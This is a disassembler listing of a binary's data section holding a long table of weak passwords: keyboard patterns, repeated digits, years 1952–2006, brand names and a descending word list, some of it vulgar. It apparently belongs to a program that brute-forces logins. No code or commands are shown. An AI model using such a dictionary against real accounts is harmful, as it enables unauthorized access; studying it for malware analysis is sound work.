aBb db 'bb',0 ; DATA XREF: .text:0042E724�o
align 4
aB_0: ; DATA XREF: .text:0042E720�o
unicode 0, <b>,0
aRfv db 'rfv',0 ; DATA XREF: .text:0042E71C�o
aEdc db 'edc',0 ; DATA XREF: .text:0042E718�o
aWsx db 'wsx',0 ; DATA XREF: .text:0042E714�o
aAsdfghjkl db 'asdfghjkl',0 ; DATA XREF: .text:0042E70C�o
align 4
aAsdfghjk db 'asdfghjk',0 ; DATA XREF: .text:0042E708�o
align 4
aAsdfghj db 'asdfghj',0 ; DATA XREF: .text:0042E704�o
aAsdfg db 'asdfg',0 ; DATA XREF: .text:0042E6FC�o
align 4
aZxcvbnm db 'zxcvbnm',0 ; DATA XREF: .text:0042E6EC�o
aZxcvbn db 'zxcvbn',0 ; DATA XREF: .text:0042E6E8�o
align 4
aZxcvb db 'zxcvb',0 ; DATA XREF: .text:0042E6E4�o
align 4
aZx db 'zx',0 ; DATA XREF: .text:0042E6D8�o
align 10h
aKonyang db 'konyang',0 ; DATA XREF: .text:0042E6D0�o
aToyota db 'TOYOTA',0 ; DATA XREF: .text:0042E698�o
align 10h
aKor db 'KOR',0 ; DATA XREF: .text:0042E694�o
aKor_0 db 'kor',0 ; DATA XREF: .text:0042E68C�o
aChi db 'chi',0 ; DATA XREF: .text:0042E688�o
aChi_0 db 'CHI',0 ; DATA XREF: .text:0042E684�o
aSystem db 'system',0 ; DATA XREF: .text:0042E67C�o
align 4
aServices db 'services',0 ; DATA XREF: .text:0042E678�o
align 4
aServers db 'servers',0 ; DATA XREF: .text:0042E674�o
aServer_0 db 'server',0 ; DATA XREF: .text:0042E66C�o
align 4
aQwertyuiop db 'qwertyuiop',0 ; DATA XREF: .text:0042E664�o
align 10h
aQwertyuio db 'qwertyuio',0 ; DATA XREF: .text:0042E660�o
align 4
aQwertyui db 'qwertyui',0 ; DATA XREF: .text:0042E65C�o
align 4
aQwertyu db 'qwertyu',0 ; DATA XREF: .text:0042E658�o
aQw db 'qw',0 ; DATA XREF: .text:0042E644�o
align 4
aAaaaaaaaa db 'aaaaaaaaa',0 ; DATA XREF: .text:0042E638�o
align 10h
aAaaaaaaa db 'aaaaaaaa',0 ; DATA XREF: .text:0042E634�o
align 4
aAaaaaaa db 'aaaaaaa',0 ; DATA XREF: .text:0042E630�o
aAaaaaa db 'aaaaaa',0 ; DATA XREF: .text:0042E62C�o
align 4
aAaaaa db 'aaaaa',0 ; DATA XREF: .text:0042E628�o
align 4
aAaaa db 'aaaa',0 ; DATA XREF: .text:0042E624�o
align 4
aAa db 'aa',0 ; DATA XREF: .text:0042E61C�o
align 10h
aNokia_0 db 'NOKIA',0 ; DATA XREF: .text:0042E610�o
align 4
aSex db 'SEX',0 ; DATA XREF: .text:0042E60C�o
aCreative db 'CREATIVE',0 ; DATA XREF: .text:0042E608�o
align 4
aDisc_0 db 'DISC',0 ; DATA XREF: .text:0042E604�o
align 10h
aMicrosoft db 'MICROSOFT',0 ; DATA XREF: .text:0042E600�o
align 4
aMaster_0 db 'MASTER',0 ; DATA XREF: .text:0042E5FC�o
align 4
aSony_0 db 'SONY',0 ; DATA XREF: .text:0042E5F8�o
align 4
aSamsung db 'samsung',0 ; DATA XREF: .text:0042E5F4�o
aSamsung_0 db 'SAMSUNG',0 ; DATA XREF: .text:0042E5F0�o
aSony db 'sony',0 ; DATA XREF: .text:0042E5EC�o
align 4
a7654321 db '7654321',0 ; DATA XREF: .text:0042E5E8�o
a4321 db '4321',0 ; DATA XREF: .text:0042E5DC�o
align 4
a321 db '321',0 ; DATA XREF: .text:0042E5D8�o
a2006 db '2006',0 ; DATA XREF: .text:0042E5D0�o
align 10h
a2005 db '2005',0 ; DATA XREF: .text:0042E5CC�o
align 4
a2004 db '2004',0 ; DATA XREF: .text:0042E5C8�o
align 10h
a2001 db '2001',0 ; DATA XREF: .text:0042E5BC�o
align 4
a2000 db '2000',0 ; DATA XREF: .text:0042E5B8�o
align 10h
a1999 db '1999',0 ; DATA XREF: .text:0042E5B4�o
align 4
a1998 db '1998',0 ; DATA XREF: .text:0042E5B0�o
align 10h
a1997 db '1997',0 ; DATA XREF: .text:0042E5AC�o
align 4
a1996 db '1996',0 ; DATA XREF: .text:0042E5A8�o
align 10h
a1995 db '1995',0 ; DATA XREF: .text:0042E5A4�o
align 4
a1994 db '1994',0 ; DATA XREF: .text:0042E5A0�o
align 10h
a1993 db '1993',0 ; DATA XREF: .text:0042E59C�o
align 4
a1992 db '1992',0 ; DATA XREF: .text:0042E598�o
align 10h
a1991 db '1991',0 ; DATA XREF: .text:0042E594�o
align 4
a1990 db '1990',0 ; DATA XREF: .text:0042E590�o
align 10h
a1989 db '1989',0 ; DATA XREF: .text:0042E58C�o
align 4
a1988 db '1988',0 ; DATA XREF: .text:0042E588�o
align 10h
a1987 db '1987',0 ; DATA XREF: .text:0042E584�o
align 4
a1986 db '1986',0 ; DATA XREF: .text:0042E580�o
align 10h
a1985 db '1985',0 ; DATA XREF: .text:0042E57C�o
align 4
a1984 db '1984',0 ; DATA XREF: .text:0042E578�o
align 10h
a1983 db '1983',0 ; DATA XREF: .text:0042E574�o
align 4
a1982 db '1982',0 ; DATA XREF: .text:0042E570�o
align 10h
a1981 db '1981',0 ; DATA XREF: .text:0042E56C�o
align 4
a1980 db '1980',0 ; DATA XREF: .text:0042E568�o
align 10h
a1979 db '1979',0 ; DATA XREF: .text:0042E564�o
align 4
a1978 db '1978',0 ; DATA XREF: .text:0042E560�o
align 10h
a1977 db '1977',0 ; DATA XREF: .text:0042E55C�o
align 4
a1976 db '1976',0 ; DATA XREF: .text:0042E558�o
align 10h
a1975 db '1975',0 ; DATA XREF: .text:0042E554�o
align 4
a1974 db '1974',0 ; DATA XREF: .text:0042E550�o
align 10h
a1973 db '1973',0 ; DATA XREF: .text:0042E54C�o
align 4
a1972 db '1972',0 ; DATA XREF: .text:0042E548�o
align 10h
a1971 db '1971',0 ; DATA XREF: .text:0042E544�o
align 4
a1970 db '1970',0 ; DATA XREF: .text:0042E540�o
align 10h
a1969 db '1969',0 ; DATA XREF: .text:0042E53C�o
align 4
a1968 db '1968',0 ; DATA XREF: .text:0042E538�o
align 10h
a1967 db '1967',0 ; DATA XREF: .text:0042E534�o
align 4
a1966 db '1966',0 ; DATA XREF: .text:0042E530�o
align 10h
a1965 db '1965',0 ; DATA XREF: .text:0042E52C�o
align 4
a1964 db '1964',0 ; DATA XREF: .text:0042E528�o
align 10h
a1963 db '1963',0 ; DATA XREF: .text:0042E524�o
align 4
a1962 db '1962',0 ; DATA XREF: .text:0042E520�o
align 10h
a1961 db '1961',0 ; DATA XREF: .text:0042E51C�o
align 4
a1960 db '1960',0 ; DATA XREF: .text:0042E518�o
align 10h
a1959 db '1959',0 ; DATA XREF: .text:0042E514�o
align 4
a1958 db '1958',0 ; DATA XREF: .text:0042E510�o
align 10h
a1957 db '1957',0 ; DATA XREF: .text:0042E50C�o
align 4
a1956 db '1956',0 ; DATA XREF: .text:0042E508�o
align 10h
a1955 db '1955',0 ; DATA XREF: .text:0042E504�o
align 4
a1954 db '1954',0 ; DATA XREF: .text:0042E500�o
align 10h
a1953 db '1953',0 ; DATA XREF: .text:0042E4FC�o
align 4
a1952 db '1952',0 ; DATA XREF: .text:0042E4F8�o
align 10h
a1234qwe db '1234qwe',0 ; DATA XREF: .text:0042E4F4�o
a1234asd db '1234asd',0 ; DATA XREF: .text:0042E4F0�o
a1234abc db '1234abc',0 ; DATA XREF: .text:0042E4EC�o
a123qwer db '123qwer',0 ; DATA XREF: .text:0042E4D8�o
a12qwe db '12qwe',0 ; DATA XREF: .text:0042E4D4�o
align 4
a12asd db '12asd',0 ; DATA XREF: .text:0042E4D0�o
align 10h
a12abc db '12abc',0 ; DATA XREF: .text:0042E4CC�o
align 4
a12qwer db '12qwer',0 ; DATA XREF: .text:0042E4C8�o
align 10h
a1qwe db '1qwe',0 ; DATA XREF: .text:0042E4C4�o
align 4
a1asd db '1asd',0 ; DATA XREF: .text:0042E4C0�o
align 10h
a1abc db '1abc',0 ; DATA XREF: .text:0042E4BC�o
align 4
a1qwer db '1qwer',0 ; DATA XREF: .text:0042E4B8�o
align 10h
a1020 db '1020',0 ; DATA XREF: .text:0042E474�o
align 4
a0258 db '0258',0 ; DATA XREF: .text:0042E470�o
align 10h
a8520 db '8520',0 ; DATA XREF: .text:0042E46C�o
align 4
a987 db '987',0 ; DATA XREF: .text:0042E468�o
a789 db '789',0 ; DATA XREF: .text:0042E464�o
a654 db '654',0 ; DATA XREF: .text:0042E460�o
a456 db '456',0 ; DATA XREF: .text:0042E45C�o
a1122 db '1122',0 ; DATA XREF: .text:0042E458�o
align 10h
a0147 db '0147',0 ; DATA XREF: .text:0042E454�o
align 4
a7410 db '7410',0 ; DATA XREF: .text:0042E450�o
align 10h
a9999999999 db '9999999999',0 ; DATA XREF: .text:0042E448�o
align 4
a999999999 db '999999999',0 ; DATA XREF: .text:0042E444�o
align 4
a99999999 db '99999999',0 ; DATA XREF: .text:0042E440�o
align 4
a9999999 db '9999999',0 ; DATA XREF: .text:0042E43C�o
a999999 db '999999',0 ; DATA XREF: .text:0042E438�o
align 4
a99999 db '99999',0 ; DATA XREF: .text:0042E434�o
align 4
a9999 db '9999',0 ; DATA XREF: .text:0042E430�o
align 4
a999 db '999',0 ; DATA XREF: .text:0042E42C�o
a99 db '99',0 ; DATA XREF: .text:0042E428�o
align 4
a9: ; DATA XREF: .text:0042E424�o
unicode 0, <9>,0
a8888888888 db '8888888888',0 ; DATA XREF: .text:0042E420�o
align 4
a888888888 db '888888888',0 ; DATA XREF: .text:0042E41C�o
align 4
a8888888 db '8888888',0 ; DATA XREF: .text:0042E414�o
a888888 db '888888',0 ; DATA XREF: .text:0042E410�o
align 4
a88888 db '88888',0 ; DATA XREF: .text:0042E40C�o
align 10h
a8888 db '8888',0 ; DATA XREF: .text:0042E408�o
align 4
a888 db '888',0 ; DATA XREF: .text:0042E404�o
a88 db '88',0 ; DATA XREF: .text:0042E400�o
align 10h
a8: ; DATA XREF: .text:0042E3FC�o
unicode 0, <8>,0
a7777777777 db '7777777777',0 ; DATA XREF: .text:0042E3F8�o
align 10h
a777777777 db '777777777',0 ; DATA XREF: .text:0042E3F4�o
align 4
a77777777 db '77777777',0 ; DATA XREF: .text:0042E3F0�o
align 4
a7777777 db '7777777',0 ; DATA XREF: .text:0042E3EC�o
a777777 db '777777',0 ; DATA XREF: .text:0042E3E8�o
align 4
a77777 db '77777',0 ; DATA XREF: .text:0042E3E4�o
align 10h
a7777 db '7777',0 ; DATA XREF: .text:0042E3E0�o
align 4
a777 db '777',0 ; DATA XREF: .text:0042E3DC�o
a77 db '77',0 ; DATA XREF: .text:0042E3D8�o
align 10h
a7: ; DATA XREF: .text:0042E3D4�o
unicode 0, <7>,0
a6666666666 db '6666666666',0 ; DATA XREF: .text:0042E3D0�o
align 10h
a666666666 db '666666666',0 ; DATA XREF: .text:0042E3CC�o
align 4
a66666666 db '66666666',0 ; DATA XREF: .text:0042E3C8�o
align 4
a6666666 db '6666666',0 ; DATA XREF: .text:0042E3C4�o
a666666 db '666666',0 ; DATA XREF: .text:0042E3C0�o
align 4
a66666 db '66666',0 ; DATA XREF: .text:0042E3BC�o
align 10h
a6666 db '6666',0 ; DATA XREF: .text:0042E3B8�o
align 4
a666 db '666',0 ; DATA XREF: .text:0042E3B4�o
a66 db '66',0 ; DATA XREF: .text:0042E3B0�o
align 10h
a6: ; DATA XREF: .text:0042E3AC�o
unicode 0, <6>,0
a5555555555 db '5555555555',0 ; DATA XREF: .text:0042E3A8�o
align 10h
a555555555 db '555555555',0 ; DATA XREF: .text:0042E3A4�o
align 4
a55555555 db '55555555',0 ; DATA XREF: .text:0042E3A0�o
align 4
a5555555 db '5555555',0 ; DATA XREF: .text:0042E39C�o
a555555 db '555555',0 ; DATA XREF: .text:0042E398�o
align 4
a55555 db '55555',0 ; DATA XREF: .text:0042E394�o
align 10h
a5555 db '5555',0 ; DATA XREF: .text:0042E390�o
align 4
a555 db '555',0 ; DATA XREF: .text:0042E38C�o
a55 db '55',0 ; DATA XREF: .text:0042E388�o
align 10h
a5_0: ; DATA XREF: .text:0042E384�o
unicode 0, <5>,0
a4444444444 db '4444444444',0 ; DATA XREF: .text:0042E380�o
align 10h
a444444444 db '444444444',0 ; DATA XREF: .text:0042E37C�o
align 4
a44444444 db '44444444',0 ; DATA XREF: .text:0042E378�o
align 4
a4444444 db '4444444',0 ; DATA XREF: .text:0042E374�o
a444444 db '444444',0 ; DATA XREF: .text:0042E370�o
align 4
a44444 db '44444',0 ; DATA XREF: .text:0042E36C�o
align 10h
a4444 db '4444',0 ; DATA XREF: .text:0042E368�o
align 4
a444 db '444',0 ; DATA XREF: .text:0042E364�o
a44 db '44',0 ; DATA XREF: .text:0042E360�o
align 10h
a4_0: ; DATA XREF: .text:0042E35C�o
unicode 0, <4>,0
a3333333333 db '3333333333',0 ; DATA XREF: .text:0042E358�o
align 10h
a333333333 db '333333333',0 ; DATA XREF: .text:0042E354�o
align 4
a33333333 db '33333333',0 ; DATA XREF: .text:0042E350�o
align 4
a3333333 db '3333333',0 ; DATA XREF: .text:0042E34C�o
a333333 db '333333',0 ; DATA XREF: .text:0042E348�o
align 4
a33333 db '33333',0 ; DATA XREF: .text:0042E344�o
align 10h
a3333 db '3333',0 ; DATA XREF: .text:0042E340�o
align 4
a333 db '333',0 ; DATA XREF: .text:0042E33C�o
a33 db '33',0 ; DATA XREF: .text:0042E338�o
align 10h
a3: ; DATA XREF: .text:0042E334�o
unicode 0, <3>,0
a2222222222 db '2222222222',0 ; DATA XREF: .text:0042E330�o
align 10h
a222222222 db '222222222',0 ; DATA XREF: .text:0042E32C�o
align 4
a22222222 db '22222222',0 ; DATA XREF: .text:0042E328�o
align 4
a2222222 db '2222222',0 ; DATA XREF: .text:0042E324�o
a222222 db '222222',0 ; DATA XREF: .text:0042E320�o
align 4
a22222 db '22222',0 ; DATA XREF: .text:0042E31C�o
align 10h
a2222 db '2222',0 ; DATA XREF: .text:0042E318�o
align 4
a222 db '222',0 ; DATA XREF: .text:0042E314�o
a22 db '22',0 ; DATA XREF: .text:0042E310�o
align 10h
a2: ; DATA XREF: .text:0042E30C�o
unicode 0, <2>,0
a1111111111 db '1111111111',0 ; DATA XREF: .text:0042E308�o
align 10h
a111111111 db '111111111',0 ; DATA XREF: .text:0042E304�o
align 4
a1111111 db '1111111',0 ; DATA XREF: .text:0042E2FC�o
a11111 db '11111',0 ; DATA XREF: .text:0042E2F4�o
align 4
a1111 db '1111',0 ; DATA XREF: .text:0042E2F0�o
align 4
a11 db '11',0 ; DATA XREF: .text:0042E2E8�o
align 4
a010 db '010',0 ; DATA XREF: .text:0042E2D8�o
a009 db '009',0 ; DATA XREF: .text:0042E2D4�o
a008 db '008',0 ; DATA XREF: .text:0042E2D0�o
a006 db '006',0 ; DATA XREF: .text:0042E2C8�o
a005 db '005',0 ; DATA XREF: sub_40CD3A+207�o
; .text:0042E2C4�o
a004 db '004',0 ; DATA XREF: .text:0042E2C0�o
a003 db '003',0 ; DATA XREF: .text:0042E2BC�o
a002 db '002',0 ; DATA XREF: .text:0042E2B8�o
a001 db '001',0 ; DATA XREF: sub_40CD3A+1F2�o
; .text:0042E2B4�o
asc_42F55C db '*********',0 ; DATA XREF: .text:0042E2B0�o
align 4
asc_42F568 db '********',0 ; DATA XREF: .text:0042E2AC�o
align 4
asc_42F574 db '*******',0 ; DATA XREF: .text:0042E2A8�o
asc_42F57C db '******',0 ; DATA XREF: .text:0042E2A4�o
align 4
asc_42F584 db '*****',0 ; DATA XREF: .text:0042E2A0�o
align 4
asc_42F58C db '****',0 ; DATA XREF: .text:0042E29C�o
align 4
asc_42F594 db '***',0 ; DATA XREF: .text:0042E298�o
asc_42F598 db '**',0 ; DATA XREF: .text:0042E294�o
align 4
a0000000000 db '0000000000',0 ; DATA XREF: .text:0042E28C�o
align 4
a000000000 db '000000000',0 ; DATA XREF: .text:0042E288�o
align 4
a@ db '@!',0 ; DATA XREF: .text:0042E268�o
align 4
a@_0 db '#@!',0 ; DATA XREF: .text:0042E264�o
a@_1 db '$#@!',0 ; DATA XREF: .text:0042E260�o
align 4
a@_2 db '%$#@!',0 ; DATA XREF: .text:0042E25C�o
align 4
a@_3 db '^%$#@!',0 ; DATA XREF: .text:0042E258�o
align 4
a@_4 db '&^%$#@!',0 ; DATA XREF: .text:0042E254�o
a@_5 db '*&^%$#@!',0 ; DATA XREF: .text:0042E250�o
align 4
asc_42F5E8 db '$$$',0 ; DATA XREF: .text:0042E24C�o
asc_42F5EC db '$$',0 ; DATA XREF: .text:0042E248�o
align 10h
asc_42F5F0: ; DATA XREF: .text:0042E244�o
unicode 0, <$>,0
a456_0 db '456+',0 ; DATA XREF: .text:0042E240�o
align 4
a789_0 db '789+',0 ; DATA XREF: .text:0042E23C�o
align 4
a0 db '=-0',0 ; DATA XREF: .text:0042E238�o
asc_42F608 db '--++',0 ; DATA XREF: .text:0042E234�o
align 10h
asc_42F610 db '-+',0 ; DATA XREF: .text:0042E230�o
align 4
asc_42F614 db '----',0 ; DATA XREF: .text:0042E22C�o
align 4
asc_42F61C db '--',0 ; DATA XREF: .text:0042E224�o
; .text:0042E228�o
align 10h
asc_42F620: ; DATA XREF: .text:0042E220�o
unicode 0, <->,0
asc_42F624 db '++++',0 ; DATA XREF: .text:0042E21C�o
align 4
asc_42F62C db '+++',0 ; DATA XREF: .text:0042E218�o
asc_42F630 db '++',0 ; DATA XREF: .text:0042E214�o
align 4
asc_42F634: ; DATA XREF: .text:0042E210�o
unicode 0, <+>,0
a@@ db '@@',0 ; DATA XREF: .text:0042E20C�o
align 4
a@_6: ; DATA XREF: sub_40CD3A+22C�o
; .text:0042E208�o
unicode 0, <@>,0
off_42F640 dd offset loc_40211F+2 ; DATA XREF: .text:0042E204�o
dword_42F644 dd 2121h dword_42F648 dd 234021h dword_42F64C dd 4021h dword_42F650 dd 21h ; sub_40CD3A+5B04�o ...
aZxcv db 'zxcv',0 ; DATA XREF: .text:0042E1D8�o
; .text:0042E6E0�o
align 4
aZxc db 'zxc',0 ; DATA XREF: .text:0042E1D4�o
; .text:0042E6DC�o
aZulu db 'zulu',0 ; DATA XREF: .text:0042E1D0�o
align 4
aZombie db 'zombie',0 ; DATA XREF: .text:0042E1CC�o
align 10h
aZmodem db 'zmodem',0 ; DATA XREF: .text:0042E1C8�o
align 4
aZimmerman db 'zimmerman',0 ; DATA XREF: .text:0042E1C4�o
align 4
aZimmerma db 'zimmerma',0 ; DATA XREF: .text:0042E1C0�o
align 10h
aZiggy db 'ziggy',0 ; DATA XREF: .text:0042E1BC�o
align 4
aZeitgeis db 'zeitgeis',0 ; DATA XREF: .text:0042E1B8�o
align 4
aZebra db 'zebra',0 ; DATA XREF: .text:0042E1B4�o
align 4
aZap db 'zap',0 ; DATA XREF: .text:0042E1B0�o
aYxcv db 'yxcv',0 ; DATA XREF: .text:0042E1AC�o
align 4
aYouwontguessme db 'youwontguessme',0 ; DATA XREF: .text:0042E1A8�o
align 4
aYoung db 'young',0 ; DATA XREF: .text:0042E1A4�o
align 10h
aYosemite db 'yosemite',0 ; DATA XREF: .text:0042E1A0�o
align 4
aYolanda db 'yolanda',0 ; DATA XREF: .text:0042E19C�o
aYellowstone db 'yellowstone',0 ; DATA XREF: .text:0042E198�o
aYellowst db 'yellowst',0 ; DATA XREF: .text:0042E194�o
align 4
aYellow db 'yellow',0 ; DATA XREF: .text:0042E190�o
align 4
aYankee db 'yankee',0 ; DATA XREF: .text:0042E18C�o
align 4
aYang db 'yang',0 ; DATA XREF: .text:0042E188�o
; .text:0042E6CC�o
align 4
aYaco db 'yaco',0 ; DATA XREF: .text:0042E184�o
; .text:0042E6C8�o
align 4
aXyzzy db 'xyzzy',0 ; DATA XREF: .text:0042E180�o
align 4
aXyz db 'xyz',0 ; DATA XREF: .text:0042E17C�o
; .text:0042E6C4�o
aXxxxxxxxx db 'xxxxxxxxx',0 ; DATA XREF: .text:0042E178�o
; .text:0042E6C0�o
align 4
aXxxxxxxx db 'xxxxxxxx',0 ; DATA XREF: .text:0042E174�o
; .text:0042E6BC�o
align 10h
aXxxxxxx db 'xxxxxxx',0 ; DATA XREF: .text:0042E170�o
; .text:0042E6B8�o
aXxxxxx db 'xxxxxx',0 ; DATA XREF: .text:0042E16C�o
; .text:0042E6B4�o
align 10h
aXxxxx db 'xxxxx',0 ; DATA XREF: .text:0042E168�o
; .text:0042E6B0�o
align 4
aXxxx db 'xxxx',0 ; DATA XREF: .text:0042E164�o
; .text:0042E6AC�o
align 10h
aXxx db 'xxx',0 ; DATA XREF: .text:0042E160�o
; .text:0042E6A8�o
aXx db 'xx',0 ; DATA XREF: .text:0042E15C�o
; .text:0042E6A4�o
align 4
aXray db 'xray',0 ; DATA XREF: .text:0042E158�o
align 10h
aXp_0 db 'xp',0 ; DATA XREF: .text:0042E154�o
align 4
aXmodem db 'xmodem',0 ; DATA XREF: .text:0042E150�o
align 4
aXmen db 'xmen',0 ; DATA XREF: .text:0042E14C�o
align 4
aXman db 'xman',0 ; DATA XREF: .text:0042E148�o
align 4
aXfer db 'xfer',0 ; DATA XREF: .text:0042E144�o
align 4
aXena db 'xena',0 ; DATA XREF: .text:0042E140�o
align 4
aWyoming db 'wyoming',0 ; DATA XREF: .text:0042E138�o
aWww db 'www',0 ; DATA XREF: .text:0042E130�o
aWwii db 'wwii',0 ; DATA XREF: .text:0042E12C�o
align 10h
aWormwood db 'wormwood',0 ; DATA XREF: .text:0042E128�o
align 4
aWorm db 'worm',0 ; DATA XREF: .text:0042E124�o
align 4
aWork db 'work',0 ; DATA XREF: .text:0042E120�o
align 4
aWorf db 'worf',0 ; DATA XREF: .text:0042E11C�o
align 4
aWordperf db 'wordperf',0 ; DATA XREF: .text:0042E118�o
align 10h
aWord db 'word',0 ; DATA XREF: .text:0042E114�o
align 4
aWoodwind db 'woodwind',0 ; DATA XREF: .text:0042E110�o
align 4
aWood db 'wood',0 ; DATA XREF: .text:0042E10C�o
align 4
aWomen db 'women',0 ; DATA XREF: .text:0042E108�o
align 4
aWombat db 'wombat',0 ; DATA XREF: .text:0042E104�o
align 4
aWoman db 'woman',0 ; DATA XREF: .text:0042E100�o
align 4
aWolverin db 'wolverin',0 ; DATA XREF: .text:0042E0FC�o
align 10h
aWolf db 'wolf',0 ; DATA XREF: .text:0042E0F8�o
align 4
aWizard db 'wizard',0 ; DATA XREF: .text:0042E0F4�o
align 10h
aWithin db 'within',0 ; DATA XREF: .text:0042E0F0�o
align 4
aWiseass db 'wiseass',0 ; DATA XREF: .text:0042E0EC�o
aWisconsin db 'wisconsin',0 ; DATA XREF: .text:0042E0E8�o
align 4
aWisconsi db 'wisconsi',0 ; DATA XREF: .text:0042E0E4�o
align 4
aWired db 'wired',0 ; DATA XREF: .text:0042E0E0�o
align 10h
aWinxp db 'winxp',0 ; DATA XREF: .text:0042E0DC�o
align 4
aWinston db 'winston',0 ; DATA XREF: .text:0042E0D8�o
aWinpass db 'winpass',0 ; DATA XREF: .text:0042E0D4�o
aWinnt db 'winnt',0 ; DATA XREF: .text:0042E0D0�o
align 10h
aWing db 'wing',0 ; DATA XREF: .text:0042E0CC�o
align 4
aWine db 'wine',0 ; DATA XREF: .text:0042E0C8�o
align 10h
aWindozexp db 'windozexp',0 ; DATA XREF: .text:0042E0C4�o
align 4
aWindozeme db 'windozeME',0 ; DATA XREF: .text:0042E0C0�o
align 4
aWindoze98 db 'windoze98',0 ; DATA XREF: .text:0042E0BC�o
align 4
aWindoze95 db 'windoze95',0 ; DATA XREF: .text:0042E0B8�o
align 10h
aWindoze2k db 'windoze2k',0 ; DATA XREF: .text:0042E0B4�o
align 4
aWindoze db 'windoze',0 ; DATA XREF: .text:0042E0B0�o
aWindowz db 'windowz',0 ; DATA XREF: .text:0042E0AC�o
aWindowsme db 'windowsME',0 ; DATA XREF: .text:0042E0A8�o
align 4
aWindows98 db 'windows98',0 ; DATA XREF: .text:0042E0A4�o
align 4
aWindows95 db 'windows95',0 ; DATA XREF: .text:0042E0A0�o
align 10h
aWindows2k db 'windows2k',0 ; DATA XREF: .text:0042E09C�o
align 4
aWindows db 'windows',0 ; DATA XREF: .text:0042E098�o
aWindose db 'windose',0 ; DATA XREF: .text:0042E094�o
aWin98 db 'win98',0 ; DATA XREF: .text:0042E090�o
align 4
aWin2k db 'win2k',0 ; DATA XREF: .text:0042E08C�o
align 4
aWin2000 db 'win2000',0 ; DATA XREF: .text:0042E088�o
aWin db 'win',0 ; DATA XREF: .text:0042E084�o
aWilma db 'wilma',0 ; DATA XREF: .text:0042E080�o
align 10h
aWillie db 'willie',0 ; DATA XREF: .text:0042E07C�o
align 4
aWilliamsburg db 'williamsburg',0 ; DATA XREF: .text:0042E078�o
align 4
aWilliams db 'williams',0 ; DATA XREF: .text:0042E074�o
align 4
aWilliam db 'william',0 ; DATA XREF: .text:0042E070�o
aWill db 'will',0 ; DATA XREF: .text:0042E06C�o
align 4
aWileecoyote db 'wileecoyote',0 ; DATA XREF: .text:0042E068�o
aWhore db 'whore',0 ; DATA XREF: .text:0042E064�o
align 4
aWholesale db 'wholesale',0 ; DATA XREF: .text:0042E060�o
align 4
aWholesal db 'wholesal',0 ; DATA XREF: .text:0042E05C�o
align 10h
aWhitney db 'whitney',0 ; DATA XREF: .text:0042E058�o
aWhiting db 'whiting',0 ; DATA XREF: .text:0042E054�o
aWhite db 'white',0 ; DATA XREF: .text:0042E050�o
align 4
aWhisky db 'whisky',0 ; DATA XREF: .text:0042E04C�o
align 10h
aWhatnot db 'whatnot',0 ; DATA XREF: .text:0042E048�o
aWhatever db 'whatever',0 ; DATA XREF: .text:0042E044�o
align 4
aWh0re db 'wh0re',0 ; DATA XREF: .text:0042E040�o
align 4
aWh0r3 db 'wh0r3',0 ; DATA XREF: .text:0042E03C�o
align 4
aWestern db 'western',0 ; DATA XREF: .text:0042E038�o
aWest db 'west',0 ; DATA XREF: .text:0042E034�o
align 4
aWerewolf db 'werewolf',0 ; DATA XREF: .text:0042E030�o
align 10h
aWendy db 'wendy',0 ; DATA XREF: .text:0042E02C�o
align 4
aWendi db 'wendi',0 ; DATA XREF: .text:0042E028�o
align 10h
aWell db 'well',0 ; DATA XREF: .text:0042E024�o
align 4
aWeenie db 'weenie',0 ; DATA XREF: .text:0042E020�o
align 10h
aWeed db 'weed',0 ; DATA XREF: .text:0042E01C�o
align 4
aWednesda db 'wednesda',0 ; DATA XREF: .text:0042E018�o
align 4
aWebpage db 'webpage',0 ; DATA XREF: .text:0042E014�o
aWeb db 'web',0 ; DATA XREF: .text:0042E010�o
aWave db 'wave',0 ; DATA XREF: .text:0042E00C�o
align 4
aWater db 'water',0 ; DATA XREF: .text:0042E008�o
align 10h
aWatchwor db 'watchwor',0 ; DATA XREF: .text:0042E004�o
align 4
aWasp db 'wasp',0 ; DATA XREF: .text:0042E000�o
align 4
aWarren db 'warren',0 ; DATA XREF: .text:0042DFFC�o
align 4
aWarp db 'warp',0 ; DATA XREF: .text:0042DFF8�o
align 4
aWargames db 'wargames',0 ; DATA XREF: .text:0042DFF4�o
align 10h
aWarfare db 'warfare',0 ; DATA XREF: .text:0042DFF0�o
aWarez db 'warez',0 ; DATA XREF: .text:0042DFEC�o
align 10h
aWard db 'ward',0 ; DATA XREF: .text:0042DFE8�o
align 4
aWaco db 'waco',0 ; DATA XREF: .text:0042DFE4�o
align 10h
aW00t db 'w00t',0 ; DATA XREF: .text:0042DFE0�o
align 4
aVodka db 'vodka',0 ; DATA XREF: .text:0042DFDC�o
align 10h
aVisualba db 'visualba',0 ; DATA XREF: .text:0042DFD8�o
align 4
aVisual db 'visual',0 ; DATA XREF: .text:0042DFD4�o
align 4
aVisitor db 'visitor',0 ; DATA XREF: .text:0042DFD0�o
aVirus db 'virus',0 ; DATA XREF: .text:0042DFCC�o
align 4
aVirginia db 'virginia',0 ; DATA XREF: .text:0042DFC8�o
align 10h
aVirgin db 'virgin',0 ; DATA XREF: .text:0042DFC4�o
align 4
aVillage db 'village',0 ; DATA XREF: .text:0042DFC0�o
aVideogam db 'videogam',0 ; DATA XREF: .text:0042DFBC�o
align 4
aVideo db 'video',0 ; DATA XREF: .text:0042DFB8�o
align 4
aVictor db 'victor',0 ; DATA XREF: .text:0042DFB4�o
align 4
aVicky db 'vicky',0 ; DATA XREF: .text:0042DFB0�o
align 4
aVertigo db 'vertigo',0 ; DATA XREF: .text:0042DFAC�o
aVeronica db 'veronica',0 ; DATA XREF: .text:0042DFA8�o
align 4
aVenus db 'venus',0 ; DATA XREF: .text:0042DFA4�o
align 10h
aVasant db 'vasant',0 ; DATA XREF: .text:0042DFA0�o
align 4
aVampire db 'vampire',0 ; DATA XREF: .text:0042DF9C�o
aValerie db 'valerie',0 ; DATA XREF: .text:0042DF98�o
aVagina db 'vagina',0 ; DATA XREF: .text:0042DF94�o
align 10h
aUwontguessme db 'uwontguessme',0 ; DATA XREF: .text:0042DF90�o
align 10h
aUucp db 'uucp',0 ; DATA XREF: .text:0042DF8C�o
align 4
aUtility db 'utility',0 ; DATA XREF: .text:0042DF88�o
aUtil db 'util',0 ; DATA XREF: .text:0042DF84�o
align 4
aUsmc db 'usmc',0 ; DATA XREF: .text:0042DF80�o
align 10h
aUserpassword db 'userpassword',0 ; DATA XREF: .text:0042DF7C�o
align 10h
aUsername db 'username',0 ; DATA XREF: .text:0042DF78�o
align 4
aUsermane db 'usermane',0 ; DATA XREF: .text:0042DF74�o
align 4
aUser1 db 'user1',0 ; DATA XREF: .text:0042DF70�o
align 10h
aUsenet db 'usenet',0 ; DATA XREF: .text:0042DF6C�o
align 4
